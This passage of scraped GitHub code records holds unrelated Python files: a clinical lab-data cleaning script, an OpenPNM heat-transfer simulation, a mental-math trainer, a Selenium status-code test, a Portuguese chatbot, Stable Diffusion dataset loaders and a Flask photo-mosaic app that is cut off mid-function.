_OUTPUT\n","repo_name":"ggaughan/pipe2py","sub_path":"pipe2py/modules/pipeurlbuilder.py","file_name":"pipeurlbuilder.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"19"} +{"seq_id":"41928696795","text":"import re\n\nimport pandas as pd\nimport numpy as np\n\nfrom edc_pdutils import identity256\n\npattern = r'^[0-9]{4}[12]{1}[0-9]{4}$'\noptions = dict(na_rep='', encoding='utf8', index=True)\n\n\ndef vl_bcpp(result, quantifier):\n vl_bcpp = np.nan\n if pd.notnull(result):\n if (result <= 400 and quantifier == '<'):\n vl_bcpp = '< 400'\n elif (result < 10000 and quantifier in ['=', '>']):\n vl_bcpp = '< 10000'\n elif (result >= 10000 and quantifier in ['=', '>']):\n vl_bcpp = '>=10000'\n return vl_bcpp\n\n\ndef vl_result(value):\n pattern = r'[0-9]\\d+'\n vl_result = np.nan\n if pd.notnull(value):\n search = re.search(pattern, value)\n if search:\n vl_result = int(search.group())\n return vl_result\n\n\ndef vl_quantifier(value):\n pattern = r'[\\<\\>]{1}'\n vl_quantifier = np.nan\n if pd.notnull(vl_result(value)):\n vl_quantifier = '='\n search = re.search(pattern, value)\n if search:\n vl_quantifier = search.group()\n return vl_quantifier\n\n\ndef cd4_result(value):\n if 
pd.notnull(value) and not re.match('[A-Za-z]', value):\n cd4_result = int(round(float(value.strip()), 0))\n else:\n cd4_result = np.nan\n return cd4_result\n\n\ndef cd4_bcpp(cd4_result):\n cd4_bcpp = np.nan\n if pd.notnull(cd4_result):\n cd4_result = int(round(float(cd4_result), 0))\n if cd4_result < 500:\n cd4_bcpp = 'LO'\n elif cd4_result >= 500:\n cd4_bcpp = 'HI'\n return cd4_bcpp\n\n\n# demographics\nipms_demo = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/IPMS_BCPP_Variables-demographics.csv')\nipms_demo['identity'] = ipms_demo.apply(lambda row: np.nan if pd.isnull(row['UniquePublicIdentifier']) else str(\n row['UniquePublicIdentifier']).strip().replace('-', '').replace('_', ''), axis=1)\nipms_demo['art_initiation_date'] = pd.to_datetime(ipms_demo['ART_INIT_DATE'])\nipms_demo['valid_identity'] = ipms_demo[pd.notnull(\n ipms_demo['identity'])]['identity'].str.match(pattern)\nipms_demo['identity256'] = ipms_demo[ipms_demo['valid_identity'] ==\n True].apply(lambda row: identity256(row, 'identity'), axis=1)\n\n# lab results\nipms_lab = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/IPMS_BCPP_Variables-lab.csv')\nipms_lab['vl_result'] = ipms_lab.apply(\n lambda row: vl_result(row['VL_Result']), axis=1)\nipms_lab['vl_quantifier'] = ipms_lab.apply(\n lambda row: vl_quantifier(row['VL_Result']), axis=1)\nipms_lab['vl_bcpp'] = ipms_lab.apply(lambda row: vl_bcpp(\n row['vl_result'], row['vl_quantifier']), axis=1)\nipms_lab['vl_datetime'] = pd.to_datetime(ipms_lab['VL_Date'])\nipms_lab['cd4_datetime'] = pd.to_datetime(ipms_lab['CD4_Date'])\nipms_lab['cd4_result'] = ipms_lab.apply(\n lambda row: cd4_result(row['CD4_Result']), axis=1)\nipms_lab['cd4_bcpp'] = ipms_lab.apply(\n lambda row: cd4_bcpp(row['cd4_result']), axis=1)\n\n# visits\nipms_visits = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/IPMS_BCPP_Variables-clinic.csv', low_memory=False)\nipms_visits.loc[:, 'visit_datetime'] = pd.to_datetime(ipms_visits['VisitDate'])\n\n# merge\nipms = pd.merge(ipms_demo, ipms_lab, on='PatientID', how='left')\nipms = pd.merge(ipms, ipms_visits[[\n 'PatientID', 'VisitID', 'visit_datetime']], on='PatientID', how='left')\nipms.sort_values(['PatientID', 'visit_datetime'], inplace=True)\n\n# flag dups\nipms['dup_vl'] = ipms.duplicated(\n ['vl_datetime', 'identity256', 'vl_result', 'vl_quantifier'])\nipms['dup_cd4'] = ipms.duplicated(\n ['cd4_datetime', 'identity256', 'cd4_result'])\nipms['dup'] = ipms.duplicated(\n ['vl_datetime', 'cd4_datetime', 'identity256', 'cd4_result', 'vl_result'])\n\n# to csv\nipms.to_csv('/Users/erikvw/Documents/bcpp/nealia_ipms.csv', **options)\n\nipms = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/nealia_ipms.csv', low_memory=False)\n\ndf_subjects = pd.read_csv(\n '/Users/erikvw/Documents/bcpp/nealia_subjects_with_pims6.csv', low_memory=False)\n\ndf = pd.merge(df_subjects, ipms.query('dup == False')[\n ['vl_datetime', 'LocationName', 'identity256', 'VL_Result']], how='left', on='identity256')\n","repo_name":"botswana-harvard/bcpp-rdb","sub_path":"bcpp_rdb/dataframes/ipms.py","file_name":"ipms.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34067884651","text":"import util\n\ndef go(db):\n print(\"subcategories in progress\")\n\n if db.has_collection('Subcategories'):\n db.delete_collection('Subcategories')\n subcategories_coll = db.create_collection('Subcategories')\n\n games_coll = db.collection(\"Games\")\n\n if db.has_collection('InSubCategory'):\n 
db.delete_collection('InSubCategory')\n    in_sub_category_coll = db.create_collection('InSubCategory', edge=True)\n\n    with open(\"../data/subcategories.csv\", \"r\", newline=\"\") as f:\n        util.handle_adjacency_csv(f, db, games_coll, subcategories_coll, in_sub_category_coll)\n\nif __name__==\"__main__\":\n    go(util.open_db())\n","repo_name":"torchipeppo/BDM-project","sub_path":"etl/subcategories.py","file_name":"subcategories.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38714324265","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 7 13:42:02 2019\n\n@author: thomas\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport openpnm as op\n\nplt.close('all')\nwrk = op.Workspace()\nspacing = 1e-5\nL = 9e-3\nNx = int(L / spacing) + 1  # np.int was deprecated and later removed from NumPy; the builtin int works\nnet = op.network.Cubic(shape=[Nx, 1, 1], spacing=spacing)\n# translate to origin\nnet['pore.coords'] -= np.array([spacing, spacing, spacing]) / 2\nnet.add_boundary_pores(labels=['left', 'right'], spacing=0.0)\n\ngeo = op.geometry.GenericGeometry(network=net, pores=net.Ps, throats=net.Ts)\ngeo['pore.diameter'] = spacing\ngeo['throat.diameter'] = spacing\ngeo['throat.length'] = spacing\ngeo['throat.area'] = (spacing)**2\ngeo['pore.area'] = (spacing)**2\ngeo['pore.volume'] = geo['pore.area'] * spacing\ngeo['throat.volume'] = 0.0\n\nT0 = 303\nK = 1\ncp = 1399\nrho = 2055\nalpha = K / (cp * rho)\nphase = op.phases.GenericPhase(network=net)\nphase['pore.conductivity'] = alpha\nphys = op.physics.GenericPhysics(network=net, geometry=geo, phase=phase)\nconc = 1.0 # mol/m^3\nphys['throat.conductance'] = conc * alpha * geo['throat.area'] / geo['throat.length']\n\nQ = 25000 / (cp * rho)\nheat_transfer_coefficient = 10\nhc = heat_transfer_coefficient / (cp * rho)\nbTs = net.throats('*boundary')\nphys['throat.conductance'][bTs] = hc * geo['throat.area'][bTs]\n\nPs_x = net['pore.coords'][:, 0]\nsource = Q * net['pore.volume']\nphys['pore.source.S1'] = 0.0\nphys['pore.source.S2'] = source\nphys['pore.source.rate'] = source\n\n\ndef run_transport(network, method='steady', t_initial=0,\n                  t_final=60 * 60 * 10, t_step=60, t_output=60):\n    if method == 'steady':\n        alg = op.algorithms.ReactiveTransport(network=network)\n        alg.setup(\n            phase=phase,\n            quantity=\"pore.temperature\",\n            conductance=\"throat.conductance\",\n            rxn_tolerance=1e-12,\n            relaxation_source=0.9,\n            relaxation_quantity=0.9,\n        )\n\n    else:\n        alg = op.algorithms.TransientReactiveTransport(network=network)\n        alg.setup(phase=phase,\n                  conductance='throat.conductance',\n                  quantity='pore.temperature',\n                  t_initial=t_initial,\n                  t_final=t_final,\n                  t_step=t_step,\n                  t_output=t_output,\n                  t_tolerance=1e-9,\n                  t_precision=12,\n                  rxn_tolerance=1e-9,\n                  t_scheme='implicit')\n        alg.set_IC(values=T0)\n\n    BP = net.pores('pore.right_boundary')\n    alg.set_value_BC(pores=BP, values=T0)\n    Ps = net.pores('internal')\n    alg.set_source(propname='pore.source', pores=Ps)\n    alg.run()\n    return alg\n\n\nalg = run_transport(network=net, method='transient')\nres = alg.results()\ntimes = list(res.keys())\nplt.figure()\ncenter = []\nmid = []\nmid_coord = int(Nx / 2)\nend = []\nfor time in times[1:]:\n    data = alg[time]\n    plt.plot(data)\n    center.append(data[0])\n    mid.append(data[mid_coord])\n    end.append(data[-3])\nlast_time = float(time.split('@')[-1]) / (60 * 60)\n\nalg = run_transport(network=net, method='steady')\nplt.plot(alg['pore.temperature'], 'k--')\nhrs = np.linspace(0, last_time, 
len(center))\nplt.figure()\nplt.plot(hrs, center)\nplt.plot(hrs, mid)\nplt.plot(hrs, end)\n","repo_name":"TomTranter/pybamm_pnm","sub_path":"utility/pnm_transient_heat.py","file_name":"pnm_transient_heat.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"36465053933","text":"import win32com.client as wincl\r\nimport numpy as np\r\nimport time\r\nimport random\r\nspeak = wincl.Dispatch(\"Sapi.SpVoice\")\r\n\r\nspeak.Rate = .01\r\nvoices = speak.GetVoices()\r\n# for voice in voices:\r\n#     print(voice.getDescription())\r\n\r\ndef two_by_two(lang = \"de\"):\r\n    # set language\r\n    if lang == \"en\":\r\n        speak.Voice = voices[1]\r\n        times = \"times\"\r\n    elif lang == \"de\":\r\n        speak.Voice = voices[0]\r\n        times = \"mal\"\r\n    else:\r\n        raise Exception(\"Language needs to be either 'en' or 'de'!\")\r\n    rand = np.random.randint(10,100,size=2)\r\n    print()\r\n    print(\"    {} * {}\".format(rand[0], rand[1]))\r\n    print()\r\n    speak.Speak(\"{} {} {}\".format(rand[0], times, rand[1]))\r\n    start = time.perf_counter()  # time.clock() was removed in Python 3.8\r\n    input(\"Press <Enter> for solution\")\r\n    print()\r\n    end = time.perf_counter()\r\n    print(\"    {}\".format(rand[0]*rand[1]))\r\n    speak.Speak(\"{}\".format(rand[0]*rand[1]))\r\n    print()\r\n    print(\"Time: {} sec ({} min)\".format(np.round(end-start, 1), np.round((end-start)/60, 2)))\r\n\r\ndef three_by_one():\r\n    left = np.random.randint(100,1000)\r\n    right = np.random.randint(1,10)    \r\n    print()\r\n    print(\"    {} * {}\".format(left, right))\r\n    print()\r\n    speak.Speak(\"{} times {}\".format(left, right))\r\n    start = time.perf_counter()\r\n    input(\"Press <Enter> for solution\")\r\n    print()\r\n    end = time.perf_counter()\r\n    print(\"    {}\".format(left*right))\r\n    speak.Speak(\"{}\".format(left*right))\r\n    print()\r\n    print(\"Time: {} sec ({} min)\".format(np.round(end-start, 1), np.round((end-start)/60, 2)))\r\n\t\r\ndef draw_operation_and_number():\r\n    rand = np.random.randint(low = 10, high = 100, size = 1)\r\n    operation = random.choice([0,1,1])\r\n    print(operation)\r\n    if operation:\r\n        rand = \"plus \" + str(rand[0])\r\n    else:\r\n        rand = \"minus \" + str(rand[0])\r\n    return(rand)\r\n\r\ndef run_training(numb_of_rounds):\r\n    n = 0\r\n    control = \"run\"\r\n    count = 0\r\n    while (n < numb_of_rounds) and (control == \"run\"):\r\n        res = draw_operation_and_number()\r\n        speak.Speak(res)\r\n        if res.split()[0] == \"minus\":\r\n            count = count - int(res.split()[1])\r\n        else:\r\n            count = count + int(res.split()[1])\r\n        key = input(\"Want to stop? Press 0!\\nPress <Enter> to continue!\")\r\n        if key == \"0\":  # input() returns a string, so compare against \"0\", not the integer 0\r\n            control = \"stop\"\r\n        n += 1\r\n    if (control == \"stop\") or (n == numb_of_rounds):\r\n        print(\"Count is: {}\".format(count))\r\n    return(count)\r\n\r\n    \r\n#%%\r\nimport win32com.client as wincl\r\nimport numpy as np\r\nimport time\r\n# make mental math trainer class\r\nclass MM_trainer:\r\n    def __init__(self):\r\n        self.speak = wincl.Dispatch(\"Sapi.SpVoice\")\r\n        self.speak.Rate = .01\r\n        self.voices = self.speak.GetVoices()\r\n        self.avg_time_sec = 0\r\n        self.total_time_sec = 0\r\n        self.n_questions = 0\r\n        self.times = \"mal\"\r\n        self.n_correct_questions = 0\r\n        self.answer = None\r\n        self.solution = None\r\n    \r\n    # get two by two question\r\n    def two_by_two(self):\r\n        rand = np.random.randint(10,100,size=2)\r\n        self.solution = str(rand[0] * rand[1])\r\n        print(\"\\n{} * {}\".format(rand[0], rand[1]))\r\n        self.speak.Speak(\"{} {} {}\".format(rand[0], self.times, rand[1]))\r\n        start = time.perf_counter()\r\n        self.answer = input(\"\\nEnter solution followed by <Enter>\")\r\n        end = time.perf_counter()\r\n        # check if answer is correct\r\n        if self.solution == self.answer:\r\n            print(\"\\nCorrect answer! Well done!\")\r\n            self.speak.Speak(\"Korrekt, sehr gut, weiter so!\")\r\n            self.n_correct_questions = self.n_correct_questions + 1\r\n        else:\r\n            print(\"\\nNot correct :(\")\r\n            self.speak.Speak(\"Falsch, Brudi\")\r\n            print(\"\\n{}\".format(rand[0] * rand[1]))\r\n            self.speak.Speak(\"{}\".format(rand[0]*rand[1]))\r\n        # update total time needed\r\n        self.total_time_sec = self.total_time_sec + end - start\r\n        # update number of questions\r\n        self.n_questions = self.n_questions + 1\r\n        # update average\r\n        self.avg_time_sec = self.total_time_sec / self.n_questions\r\n        # print results\r\n        print(\"\\nTime: {} sec ({} min)\".format(np.round(end-start, 1), np.round((end-start)/60, 2)))\r\n        print(\"\\n--------\\nAvg Time: {} sec\".format(np.round(self.avg_time_sec, 1)))\r\n    \r\n    def set_language(self, lang = \"de\"):\r\n        pass\r\n        # self.speak.Voice = \r\n\r\n\r\n    \r\n    ","repo_name":"morchius/mental-math-trainer","sub_path":"mental_math_trainer.py","file_name":"mental_math_trainer.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32433271174","text":"import selenium\r\nfrom selenium.webdriver.common.by import By\r\nimport unittest\r\n### a test made just to exercise clicks and to check that the page response loaded properly ###\r\n### I do not recommend using Selenium for API testing ###\r\n\r\nclass TestStatusCodes(unittest.TestCase):\r\n    # the setUp and tearDown methods run before and after every test\r\n    def setUp(self):\r\n        self.driver = selenium.webdriver.Chrome()\r\n        self.driver.get('https://the-internet.herokuapp.com')\r\n        self.driver.set_window_size(1000, 750)\r\n        self.driver.implicitly_wait(10)\r\n\r\n    def tearDown(self):\r\n        self.driver.quit()\r\n\r\n    def test_download_secure(self):\r\n        self.driver.find_element(By.LINK_TEXT, \"Redirect Link\").click()\r\n        self.driver.find_element(By.LINK_TEXT, \"here\").click()\r\n        # it is possible to chain the click directly onto the link-text lookup, but that would make asserting harder\r\n        code_500 = self.driver.find_element(By.LINK_TEXT, \"500\")\r\n        code_500.click()\r\n        # locate the new element that contains the status message\r\n        status_page = self.driver.find_element(By.XPATH,\r\n                                               \"//p[contains(text(),'This page returned a 500 status code.')]\")\r\n        # assert to see if the loaded page has the correct message\r\n        assert 'This page returned a 
500 status code.' in status_page.text\r\n        # use .back() to go back one page\r\n        self.driver.back()\r\n\r\n        code_404 = self.driver.find_element(By.LINK_TEXT, \"404\")\r\n        code_404.click()\r\n        status_page = self.driver.find_element(By.XPATH,\r\n                                               \"//p[contains(text(),'This page returned a 404 status code.')]\")\r\n        assert 'This page returned a 404 status code.' in status_page.text\r\n        self.driver.back()\r\n\r\n        code_301 = self.driver.find_element(By.LINK_TEXT, \"301\")\r\n        code_301.click()\r\n        status_page = self.driver.find_element(By.XPATH,\r\n                                               \"//p[contains(text(),'This page returned a 301 status code.')]\")\r\n        assert 'This page returned a 301 status code.' in status_page.text\r\n        self.driver.back()\r\n\r\n        code_200 = self.driver.find_element(By.LINK_TEXT, \"200\")\r\n        code_200.click()\r\n        status_page = self.driver.find_element(By.XPATH,\r\n                                               \"//p[contains(text(),'This page returned a 200 status code.')]\")\r\n        assert 'This page returned a 200 status code.' in status_page.text\r\n        self.driver.back()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    unittest.main()\r\n","repo_name":"dbeniamin/Selenium_automation","sub_path":"status_codes_unittest.py","file_name":"status_codes_unittest.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14709420699","text":"import requests\nimport random\n\nclass Chatbot:\n\n    nome_chatbot = 'DuChat'\n\n    def __init__(self) -> None:\n        pass\n\n    def sequencia_fibonacci(self):\n        n = int(input(\"Que termo deseja encontrar: \"))\n        ultimo=1\n        penultimo=1\n\n        if (n==1) or (n==2):\n            print(\"1\")\n        else:\n            for count in range(2,n):\n                termo = ultimo + penultimo\n                penultimo = ultimo\n                ultimo = termo\n                count += 1\n                print(termo, end=' -> ')\n\n    def descubra_seu_signo(self, dia, mes):\n        if mes == 'dezembro':\n            astro_sign = 'Sagittarius' if (dia < 22) else 'Capricorn'\n        elif mes == 'janeiro':\n            astro_sign = 'Capricorn' if (dia < 20) else 'Aquarius'\n        elif mes == 'fevereiro':\n            astro_sign = 'Aquarius' if (dia < 19) else 'Pisces'\n        elif mes == 'março':\n            astro_sign = 'Pisces' if (dia < 21) else 'Aries'\n        elif mes == 'abril':\n            astro_sign = 'Aries' if (dia < 20) else 'Taurus'\n        elif mes == 'maio':\n            astro_sign = 'Taurus' if (dia < 21) else 'Gemini'\n        elif mes == 'junho':\n            astro_sign = 'Gemini' if (dia < 21) else 'Cancer'\n        elif mes == 'julho':\n            astro_sign = 'Cancer' if (dia < 23) else 'Leo'\n        elif mes == 'agosto':\n            astro_sign = 'Leo' if (dia < 23) else 'Virgo'\n        elif mes == 'setembro':\n            astro_sign = 'Virgo' if (dia < 23) else 'Libra'\n        elif mes == 'outubro':\n            astro_sign = 'Libra' if (dia < 23) else 'Scorpio'\n        elif mes == 'novembro':\n            astro_sign = 'Scorpio' if (dia < 22) else 'Sagittarius'\n        else:\n            astro_sign = 'Mês inválido'  # guard added so astro_sign is always defined\n        print(astro_sign)\n\n    def piada(self):\n        piada = requests.get('https://geek-jokes.sameerkumar.website/api?format=json')\n        print(piada.json()['joke'])\n\n    def charada(self):\n        # a dict cannot hold duplicate keys, so the riddles are kept in a list of dicts\n        charadas = [\n            {'pergunta': 'Sem sair do seu cantinho, é capaz de viajar ao redor do mundo.', 'resposta': 'selo'},\n            {'pergunta': 'É feito de água, mas se for colocado dentro da água morrerá.', 'resposta': 'gelo'},\n        ]\n        escolhida = random.choice(charadas)\n        charada = input(f\"O que é o que é? {escolhida['pergunta']} \")\n        return escolhida['resposta'] == charada.strip().lower()\n    \n    def get_nome_chatbot(self):\n        return self.nome_chatbot\n\ndef main():\n    print('-='*20)\n    print('\\n 1 = SEQUÊNCIA DE FIBONACCI \\n 2 = DESCUBRA SEU SIGNO \\n 3 = DESCUBRA MEU NOME \\n 4 = PIADA \\n 5 = CHARADA')\n    opcao = int(input('Como posso lhe ajudar? 
'))\n    print('-='*20)\n\n    chatbot = Chatbot()\n    \n    if opcao == 1:\n        print('Sequência de Fibonacci')\n        chatbot.sequencia_fibonacci()  # the method prints the sequence itself and returns None\n    elif opcao == 2:\n        dia = int(input('Informe seu dia de nascimento: '))\n        mes = input('Informe o seu mês de nascimento: ')\n        chatbot.descubra_seu_signo(dia, mes)\n    elif opcao == 3:\n        print(f'Olá me chamo {chatbot.get_nome_chatbot()}')\n    elif opcao == 4:\n        chatbot.piada()\n    elif opcao == 5:\n        print('Acertou!' if chatbot.charada() else 'Errou!')  # give the user feedback on the riddle\n    else:\n        print('Valor Inválido!')\nif __name__ == \"__main__\":\n    main()\n","repo_name":"diegolisboadev/Exercicios_com_Python3","sub_path":"ExerciciosPythonCursosExtras/main_chatbot.py","file_name":"main_chatbot.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21299813094","text":"import random\n\nimport cv2\nimport h5py\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom transformers import CLIPTokenizer\n\nfrom models.blip_override.blip import init_tokenizer  # needed by StoryDataset below; was commented out\n\nfrom PIL import Image\nimport pandas as pd\n\nclass ImageDataset(Dataset):\n    def __init__(self, subset, args):\n        super(ImageDataset, self).__init__()\n\n        self.args = args\n        self.csv_file = args.get(args.dataset).csv_file\n\n        self.data = pd.read_csv(self.csv_file)\n        self.data = (self.data[:int(self.data.shape[0]*0.8)] if subset==\"train\" else self.data[int(self.data.shape[0]*0.8):int(self.data.shape[0]*0.9)] if subset==\"val\" else self.data[int(self.data.shape[0]*0.9):]).reset_index()\n        self.image_paths = \"/\".join(self.csv_file.split(\"/\")[:-1]) + \"/\" + self.data['image_path']\n        self.captions = self.data['caption']\n        \n        self.augment = transforms.Compose([\n            # transforms.ToPILImage(),\n            transforms.Resize([512, 512]),\n            transforms.ToTensor(),\n            transforms.Normalize([0.5], [0.5])\n        ])\n        \n        self.subset = subset\n        self.dataset = args.dataset\n\n        self.max_length = args.get(args.dataset).max_length\n\n        self.clip_tokenizer = CLIPTokenizer.from_pretrained('runwayml/stable-diffusion-v1-5', subfolder=\"tokenizer\")\n        msg = self.clip_tokenizer.add_tokens(list(args.get(args.dataset).new_tokens))\n        print(\"clip {} new tokens added\".format(msg))\n    \n    def __len__(self):\n        return len(self.data)\n    \n    def __getitem__(self, index):\n        image_path = self.image_paths[index]\n        caption = self.captions[index]\n        \n        # Load image\n        image = Image.open(image_path)\n        image = self.augment(image) if self.subset in ['train', 'val'] else torch.from_numpy(np.array(image))\n        \n        \n        text = self.data['caption'][index]\n\n        # tokenize caption using default tokenizer\n        tokenized = self.clip_tokenizer(\n            text,\n            padding=\"max_length\",\n            max_length=self.max_length,\n            truncation=False,\n            return_tensors=\"pt\",\n        )\n        caption, attention_mask = tokenized['input_ids'], tokenized['attention_mask']\n\n        return image, caption, attention_mask\n\nclass StoryDataset(Dataset):\n    \"\"\"\n    A custom subset class for the LRW (includes train, val, test) subset\n    \"\"\"\n\n    def __init__(self, subset, args):\n        super(StoryDataset, self).__init__()\n        self.args = args\n\n        self.h5_file = args.get(args.dataset).hdf5_file\n        self.subset = subset\n\n        self.augment = transforms.Compose([\n            transforms.ToPILImage(),\n            transforms.Resize([512, 512]),\n            transforms.ToTensor(),\n            transforms.Normalize([0.5], [0.5])\n        ])\n        self.dataset = args.dataset\n        self.max_length = args.get(args.dataset).max_length\n        self.clip_tokenizer = 
CLIPTokenizer.from_pretrained('runwayml/stable-diffusion-v1-5', subfolder=\"tokenizer\")\n self.blip_tokenizer = init_tokenizer()\n msg = self.clip_tokenizer.add_tokens(list(args.get(args.dataset).new_tokens))\n print(\"clip {} new tokens added\".format(msg))\n msg = self.blip_tokenizer.add_tokens(list(args.get(args.dataset).new_tokens))\n print(\"blip {} new tokens added\".format(msg))\n\n self.blip_image_processor = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize([224, 224]),\n transforms.ToTensor(),# scales to 0,1\n transforms.Normalize([0.48145466, 0.4578275, 0.40821073], [0.26862954, 0.26130258, 0.27577711]) ## (pixel[r,g,b]-mean)/std\n ])\n\n def open_h5(self):\n h5 = h5py.File(self.h5_file, \"r\")\n self.h5 = h5[self.subset]\n\n def __getitem__(self, index):\n if not hasattr(self, 'h5'):\n self.open_h5()\n\n images = list()\n for i in range(5):\n im = self.h5['image{}'.format(i)][index]\n im = cv2.imdecode(im, cv2.IMREAD_COLOR)\n idx = random.randint(0, 4)\n images.append(im[idx * 128: (idx + 1) * 128])#selects a random portion of the image vertically with a height of 128 pixels\n\n source_images = torch.stack([self.blip_image_processor(im) for im in images])\n images = images[1:] if self.args.task == 'continuation' else images\n images = torch.stack([self.augment(im) for im in images]) \\\n if self.subset in ['train', 'val'] else torch.from_numpy(np.array(images))\n\n texts = self.h5['text'][index].decode('utf-8').split('|')\n\n # tokenize caption using default tokenizer\n tokenized = self.clip_tokenizer(\n texts[1:] if self.args.task == 'continuation' else texts,\n padding=\"max_length\",\n max_length=self.max_length,\n truncation=False,\n return_tensors=\"pt\",\n )\n captions, attention_mask = tokenized['input_ids'], tokenized['attention_mask']\n\n tokenized = self.blip_tokenizer(\n texts,\n padding=\"max_length\",\n max_length=self.max_length,\n truncation=False,\n return_tensors=\"pt\",\n )\n source_caption, source_attention_mask = tokenized['input_ids'], tokenized['attention_mask']\n return images, captions, attention_mask, source_images, source_caption, source_attention_mask\n\n def __len__(self):\n if not hasattr(self, 'h5'):\n self.open_h5()\n return len(self.h5['text'])\n\n\n# if __name__==\"__main__\":\n# from torch.utils.data import DataLoader\n# # Define your arguments\n# class Args:\n# dataset = 'flintstones'\n# flintstones = {\n# \"csv_file\" : '/home/nlab/abouelaecha/finetune_stable_diffusion/data/data.csv',\n# \"max_length\" : 91,\n# \"new_tokens\" : [ \"fred\", \"barney\", \"wilma\", \"betty\", \"pebbles\", \"dino\", \"slate\" ],\n# }\n# def get(self, _dataset):\n# return getattr(self, _dataset)\n\n# args = Args()\n\n# # Create an instance of the ImageDataset\n# dataset = ImageDataset(subset='train', args=args)\n\n# # Example usage\n# index = 0\n# image, caption, attention_mask = dataset[index]\n\n# # Print the shapes\n# print(\"Image shape:\", image.shape)\n# print(\"Caption shape:\", caption.shape)\n# print(\"Attention mask shape:\", attention_mask.shape)\n\n# # Create a data loader\n# batch_size = 16\n# dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=True)\n\n# # Iterate over the data loader\n# for images, captions, attention_masks in dataloader:\n# # Perform operations on the batched data\n# # For example, pass the images and captions through your model\n# # ...\n# # ...\n# # Perform any necessary calculations or computations\n# # ...\n\n# # Print the shapes of the batched data\n# print(\"Batched images shape:\", 
images.shape)\n# print(\"Batched captions shape:\", captions.shape)\n# print(\"Batched attention masks shape:\", attention_masks.shape)\n","repo_name":"othmane-ab/LM-LDM","sub_path":"datasets/flintstones.py","file_name":"flintstones.py","file_ext":"py","file_size_in_byte":7192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"42504106622","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019/1/19 20:49 \r\n# @Author : for \r\n# @File : 02_classmethod_test.py \r\n# @Software: PyCharm\r\n# class People(object):\r\n#     # class attribute\r\n#     country = 'china'\r\n#     @classmethod # class method\r\n#     def getCountry(cls):\r\n#         return cls.country\r\n#     @classmethod\r\n#     def setCountry(cls,country):\r\n#         cls.country = country\r\n# p = People()\r\n# print(p.getCountry())\r\n# print(People.getCountry())\r\n# p.setCountry('japan')\r\n# print(p.getCountry())\r\n# print(People.getCountry())\r\n#staticmethod\r\nclass People(object):\r\n    # class attribute\r\n    country = 'china'\r\n    # static method - there is no cls to carry the class object, so it can only be reached through the class object itself\r\n    @staticmethod\r\n    def __getCountry():\r\n        print(People.country)\r\n    def test(self):\r\n        People.__getCountry()\r\nPeople._People__getCountry() # name mangling: outside the class the private method is only reachable via its mangled name\r\nP = People()\r\n# P.getCountry()\r\nP.test()\r\n\r\n\r\n","repo_name":"xuegod6/xuegod_code","sub_path":"1_10_面向对象的三大方法/02_classmethod_test.py","file_name":"02_classmethod_test.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"28804321219","text":"from flask import Flask, request, render_template, redirect, Markup, send_from_directory, send_file\nfrom PIL import Image\nimport urllib.request\nimport random\napp = Flask(__name__)\n\n# Photo layout for a given number of photos: (count in the first, second, third row)\nuklad = [(1,0,0),(2,0,0),(2,1,0),(2,2,0),(3,2,0),(3,3,0),(2,3,2),(3,2,3)]\n\n'''\nMain selection form\n'''\n@app.route(\"/\", methods=[\"GET\",\"POST\"])\ndef index():\n    if request.method == \"POST\":\n        try:\n            los = request.form[\"los\"]\n            los = 1\n        except KeyError:\n            los = 0\n        resX = request.form[\"resX\"]\n        resY = request.form[\"resY\"]\n        zdjecia = []\n        flaga = False\n        for i in range(1,9):\n            if request.form[\"url\"+str(i)]:\n                if flaga:\n                    zdjecia.append(\",\")\n                zdjecia.append(request.form[\"url\"+str(i)])\n                flaga = True\n        if not resY: \n            resY=\"2048\"\n        if not resX:\n            resX=\"2048\"\n        return redirect(\"mozaika?losowo=\"+str(los)+\"&rozdzielczosc=\"+resX+\"x\"+resY+\"&zdjecia=\"+\"\".join(zdjecia))\n    return render_template(\"index.html\")\n\n'''\nFunction shuffling the order of the photos\n'''\ndef shuffle(zdjecia):\n    for i in range(len(zdjecia)):\n        rand = random.randrange(len(zdjecia))\n        zdjecia[i], zdjecia[rand] = zdjecia[rand], zdjecia[i]\n\n\n'''\nFunction creating the mosaic\n'''\ndef create_image(losowo, x, y, zdjecia):\n    n = int((len(zdjecia) + 1) / 2)\n\n    if losowo:\n        shuffle(zdjecia)\n\n    new_img = Image.new(\"RGB\", (x, y), color=(255,255,255))\n    x_off = 0\n    y_off = 0\n    max_y_off = 0\n    j = 0 # column\n    k = 0 # row\n    n_y = 3 - uklad[len(zdjecia)-1].count(0)\n    for i in zdjecia:\n        if j == uklad[len(zdjecia)-1][k]:\n            if k == 0:\n                y_off = 0\n            j = 0\n            k += 1\n            y_off += int(y / n_y)\n            x_off = 0\n            if k == 2:\n                y_off = max_y_off\n        scale(x,y,i,uklad[len(zdjecia)-1][k],n_y)\n        if k == 0:\n            